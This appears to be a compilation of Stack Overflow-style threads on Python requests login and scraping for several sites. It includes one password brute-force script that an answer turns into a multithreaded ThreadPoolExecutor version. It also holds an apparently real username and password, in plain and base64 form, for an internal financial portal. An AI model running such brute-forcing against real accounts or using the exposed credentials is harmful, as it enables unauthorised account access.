I am trying to scrape servers list from https://www.astrill.com/member-zone/tools/vpn-servers which is for members only. Username, password and captcha are required. Everything works if I login with browser and copy 'PHPSESSID' cookie, but I want to log in with Python. I am downloading capthca and enter it manually. But anyway I am not able to login. Login URL: https://www.astrill.com/member-zone/log-in
Could anybody help me, please?
SERVERS_URL = 'https://www.astrill.com/member-zone/tools/vpn-servers'
LOGIN_URL = 'https://www.astrill.com/member-zone/log-in'
def get_capcha(url):
print(f'Scraping url: {url}')
try:
response = requests.get(url)
response.raise_for_status()
except Exception as e:
print(type(e), e)
if response.status_code == 200:
print('Success!')
page = response.content
soup = bs4.BeautifulSoup(page, 'html.parser')
captcha_url = (soup.find('img', alt='captcha')['src'])
captcha_file = os.path.join(BASE_FOLDER, 'captcha.jpg')
id = soup.find(id='csrf_token')
print(id['value'])
print(f'Captcha: {captcha_url}')
print(response.headers)
urlretrieve(captcha_url, captcha_file)
return id['value']
def login(url, id):
captcha_text = input('Captcha: ')
print(id)
payload = {
'action': 'log-in',
'username': 'myusername#a.com',
'password': '1111111',
'captcha': captcha_text,
'_random': 'l4r1b7hf4g',
'csrf_token': id
}
session = requests.session()
post = session.post(url, data=payload)
r = session.get(SERVERS_URL)
print(r.text)
print(r.cookies)
if __name__ == '__main__':
id = get_capcha(LOGIN_URL)
login(LOGIN_URL, id)
First of all I was not sure about payload fields to POST. They can be easily discovered with Firefox Developer Tools - Network. You can find what does your browser actually post there. Second thing which I discovered was that I need to request capthca file within the session with my headers and cookies. So my code looks like following now and it works! (probably some header fields can be removed)
cookies = {}
headers = {
'Host': 'www.astrill.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '169',
'Origin': 'https://www.astrill.com',
'Connection': 'keep-alive',
'Referer': 'https://www.astrill.com/member-zone/log-in',
}
payload = {
'action': 'log-in',
'username': 'myusername#a.com',
'password': '1111111',
'remember_me': 0,
'captcha': '',
'_random': 'somerandom1',
'csrf_token': ''
}
def get_capcha(url):
print(f'Scraping url: {url}')
try:
response = session.get(url)
response.raise_for_status()
except Exception as e:
print(type(e), e)
if response.status_code == 200:
print('Success!')
page = response.content
soup = bs4.BeautifulSoup(page, 'html.parser')
captcha_url = (soup.find('img', alt='captcha')['src'])
captcha_file = os.path.join(BASE_FOLDER, 'captcha.jpg')
payload['csrf_token'] = soup.find(id='csrf_token')['value']
print(f'csrf_token: {payload["csrf_token"]}')
print(f'Captcha: {captcha_url}')
cookies.update(response.cookies)
captcha_img = session.get(captcha_url, headers=headers, cookies=cookies)
file = open(captcha_file, "wb")
file.write(captcha_img.content)
file.close()
payload['captcha'] = input('Captcha: ')
return
def login(url):
post = session.post(url, data=payload, headers=headers, cookies=cookies)
print(post.text)
r = session.get(SERVERS_URL, cookies=cookies)
print(r.text)
print(r.cookies)
def main():
get_capcha(LOGIN_URL)
login(LOGIN_URL)
if __name__ == '__main__':
main()
Related
i am creating a custom tool for login bruteforce on web application for bug bounty hunting so i came to a bug on one web application which i had to create my own tool to bruteforce this is not a complete tool but i need solution for the current code for adding threads
import requests
import re
exploit = open('password.txt', 'r').readlines()
headers = {
'Host': 'TARGET.COM',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'iframe',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
for line in exploit:
params = {
'execution': '111u9342',
'client_id': 'client-23429df',
'tab_id': '234324',
}
password = line.strip()
http = requests.post('https://www.target.com/test',
params=params,
headers=headers,
data={'username':myname,'password':password},
verify=False,
proxies=proxies)
content = http.content
print("finished")
I am beginner in python
You can use it ThreadPoolExecuter;
from concurrent.futures import ThreadPoolExecutor
import requests
# ....Other code parts...
def base_post(url, header, data, proxies, timeout=10):
response = requests.post(url, headers=header, data=data, proxies=proxies, timeout=timeout)
return response
total_possibilities = []
exploit = []
for line in exploit:
params = {
'execution': '111u9342',
'client_id': 'client-23429df',
'tab_id': '234324',
}
password = line.strip()
total_possibilities.append({'url': "...",
"params": params,
"headers": headers,
"data": {'username': myname, 'password': password},
"verify": False,
"proxies": proxies
"content": http.content})
results = []
with ThreadPoolExecutor(max_workers=3) as executor:
for row in total_possibilities:
results.append(executor.submit(base_post, **row))
print(results)
Don't forget to update "max_workers" based on your needs.
here my code :
session = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'}
def generating_data():
main_url='https://opencorporates.com/users/sign_in'
r1 = session.get(main_url, headers=headers)
soup = BeautifulSoup(r1.text, 'html.parser')
tokens = soup.find('meta', attrs={'name':'csrf-token'})
token = tokens.get('content')
print(f'token is : {token}')
print('Login!')
datas = {
'utf8': '✓',
'authenticity_token': token,
'user[email]':'user',
'user[password]':'pass',
'submit':''
}
r2 = session.post('https://opencorporates.com/users/sign_in',headers=headers, data=datas, cookies=r1.cookies)
r3 = session.get('https://opencorporates.com/companies?utf8=%E2%9C%93&q=above+and+beyond&commit=Go&jurisdiction_code=&utf8=%E2%9C%93&commit=Go =&controller=searches&action=search_companies&inactive=false&mode=best_fields&search_fields[]=name&branch=false&nonprofit=&order=score', headers=headers, cookies=r1.cookies)
f = open('./res.html', 'w+')
f.write(r3.text)
f.close
generating_data()
i already get the result of login if print the r2 line, but when change to next line r3, it show the page like we are not login yet, anyone can help ? thanks
You need to remove the portion cookies=r1.cookies since you are already using a session. What this does is it overwrites the cookies collected from response of r2 that would have been sent along with the request, and which might been important for logging in. Same goes for the r2. In general, you do not need to deal with cookies yourself when you are using a session with requests. Your code for generating_data() then becomes:
def generating_data():
main_url='https://opencorporates.com/users/sign_in'
r1 = session.get(main_url, headers=headers)
soup = BeautifulSoup(r1.text, 'html.parser')
tokens = soup.find('meta', attrs={'name':'csrf-token'})
token = tokens.get('content')
print(f'token is : {token}')
print('Login!')
datas = {
'utf8': '✓',
'authenticity_token': token,
'user[email]':'user',
'user[password]':'pass',
'submit':''
}
r2 = session.post('https://opencorporates.com/users/sign_in',headers=headers, data=datas)
r3 = session.get('https://opencorporates.com/companies?utf8=%E2%9C%93&q=above+and+beyond&commit=Go&jurisdiction_code=&utf8=%E2%9C%93&commit=Go =&controller=searches&action=search_companies&inactive=false&mode=best_fields&search_fields[]=name&branch=false&nonprofit=&order=score', headers=headers)
f = open('./res.html', 'w+')
f.write(r3.text)
f.close
There is an url: https://maps.leicester.gov.uk/map/Aurora.svc/run?inspect_query=QPPRN&inspect_value=ROH9385&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript%24&nocache=f73eee56-45da-f708-87e7-42e82982370f&resize=always
It returns the coordinates. To get the coordinates - it does 3 requests(I SUPPOSE):
the url mentioned above
requesting session_id
getting coordinates using previousely mentioned session_id.
I am getting session_id in the 2nd step, but it is wrong. I can't get coordinates in step 3 using it. How can I know that the problem is in session_id? When I insert the session_id taken from the browser - my code works fine and coordinates are received.
Here are the requests in browser:
Here is the correct response from browser:
And this is what I'm getting with my code:
Here is my code (it is for Scrapy framework):
'''
import inline_requests
#inline_requests.inline_requests
def get_map_data(self, response):
""" Getting map data. """
map_referer = ("https://maps.leicester.gov.uk/map/Aurora.svc/run?inspect_query=QPPRN&"
"inspect_value=ROH9385&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript"
"%24&nocache=f73eee56-45da-f708-87e7-42e82982370f&resize=always")
response = yield scrapy.Request(
url=map_referer,
meta=response.meta,
method='GET',
dont_filter=True,
)
time_str = str(int(time.time()*1000))
headers = {
'Referer': response.url,
'Accept': 'application/javascript, */*; q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
'Host': 'maps.leicester.gov.uk',
'Sec-Fetch-Dest': 'script',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Site': 'same-origin',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'
}
response.meta['handle_httpstatus_all'] = True
url = ( 'https://maps.leicester.gov.uk/map/Aurora.svc/RequestSession?userName=inguest'
'&password=&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript%24&'
f'callback=_jqjsp&_{time_str}=' )
reqest_session_response = yield scrapy.Request(
url=url,
meta=response.meta,
method='GET',
headers=headers,
dont_filter=True,
)
session_id = re.search(r'"SessionId":"([^"]+)', reqest_session_response.text)
session_id = session_id.group(1) if session_id else None
print(8888888888888)
print(session_id)
# session_id = '954f04e2-e52c-4dd9-9046-f3f013d3f633'
# pprn = item.get('other', {}).get('PPRN')
pprn = 'ROH9385' # hard coded for the current page
if session_id and pprn:
time_str = str(int(time.time()*1000))
url = ('https://maps.leicester.gov.uk/map/Aurora.svc/FindValue'
f'Location?sessionId={session_id}&value={pprn}&query=QPPRN&callback=_jqjsp'
f'&_{time_str}=')
coords_response = yield scrapy.Request(
url = url,
method='GET',
meta=reqest_session_response.meta,
dont_filter = True,
)
print(coords_response.text)
breakpoint()'''
Could you please correct my code so that it could get coordinates?
The website creates a sessionId first, then use the sessionId creates a layer on server (I guess). Then you can start requesting, otherwise it can't find the map layer under that sessionId.
import requests
url = "https://maps.leicester.gov.uk/map/Aurora.svc/RequestSession?userName=inguest&password=&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript%24"
res = requests.get(url, verify=False).json()
sid = res["Session"]["SessionId"]
url = f"https://maps.leicester.gov.uk/map/Aurora.svc/OpenScriptMap?sessionId={sid}"
res = requests.get(url, verify=False)
url = f"https://maps.leicester.gov.uk/map/Aurora.svc/FindValueLocation?sessionId={sid}&value=ROH9385&query=QPPRN"
res = requests.get(url, verify=False).json()
print(res)
I did research on og python requests by passing xml parameters but without much success with this specific page. I can not log in. If someone already had a similar experience any direction help is welcome. My code as follows:
import requests
from bs4 import BeautifulSoup
def main():
# 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html?timestamp=1478706683443?redirect=true'
# 'LOGIN:Login'
s = requests.Session()
headers = {
'Accept': 'application/xml, text/xml, */*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'Keep-Alive',
'Content-Type': 'text/xml',
'Host': 'plataformafinanceira.xxxxxxxxbr.corp',
'Referer': 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html?redirect=true',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)'
}
url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html?timestamp=1478706683443?redirect=true'
r = s.get(url, headers=headers, verify=False)
print('************************************')
print(r.status_code)
print(r.cookies.get_dict())
print('************************************')
cookies = r.cookies.get_dict()
xml = '''
<?xml version="1.0" encoding="ISO-8859-1"?><request>
<login type="group">
<row>
<id_user><![CDATA[x050432]]></id_user>
<ds_password><![CDATA[NDY0NnBvcnQ=]]></ds_password>
<version><![CDATA[2]]></version>
</row>
</login>
</request>
'''
payload = {
'id_user': 'x050432',
'txtcd_Pwd': '4646port',
'version': '2'
}
url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/common/callService.do?name=LOGIN:Login-%3Elogin'
r = s.post(url, headers=headers, auth=('x050432', '4646port'), cookies=cookies, verify=False)
print('++++++++++++++++++++++++++++++++++++')
print(r.status_code)
print(r.cookies.get_dict())
print('++++++++++++++++++++++++++++++++++++')
# r = s.post(url, headers=headers, auth=('x050432', '4646port'), data=payload, cookies=cookies)
# r = s.post(url, headers=headers, data=payload, cookies=cookies, verify=False)
# url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/iframePrincipal.html?funcao=index×tamp=1562604252980'
# r = s.post(url, headers=headers, cookies=cookies, verify=False)
# r = s.post(url, headers=headers, auth=('x050432', '4646port'), data=payload, cookies=cookies)
# print(r.status_code)
# print(r.cookies.get_dict())
# # print(r.text)
with open('portal.html', 'w') as f:
f.write(r.text)
# print(r.text)
# InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
# url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html'
if __name__ == '__main__':
main()
The image:
I am trying to download a file with python using "requests.Session" in order to take cookies into account.
My following code return the source code of the second webpage but does not download the file... even if I have included the header and the parameters...
I am running out of idea to find the problem here ...
s = requests.Session()
url_euronex = "https://www.euronext.com/equities/directory"
response = s.get(url_euronex)
response_code = response.status_code
if response_code==200:
content = response.text
token = content[content.index('formKey=nyx_pd_filter_values:')+29 : content.index('dataTableInitCallback')-3]
url = "https://www.euronext.com/fr/popup/data/download?ml=nyx_pd_stocks&cmd=default&formKey=nyx_pd_filter_values%3A"+str(token)
print(url)
headers = {
'Host':'www.euronext.com',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate, br',
'Referer':url,
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'135',
'Connection':'keep-alive',
'Upgrade-Insecure-Requests':'1'}
Params = {'Query string':{'ml':'nyx_pd_stocks', 'cmd':'default', 'formKey':'nyx_pd_filter_values:'+str(token)}, 'Form data':{'format':'3','layout':'2','decimal_separator':'1','date_format':'1','op':'Go','form_build_id':'form-64080cce1044e288464d174290cb40e9','form_id':'nyx_download_form'}}
data = [{'url': url, 'params': Params, 'method': 'post'}]
r = s.post(url, json=data, headers=headers)
if r.status_code==200:
print('coucou')
#resultat = (r.text).encode('utf-8')
print(r.text)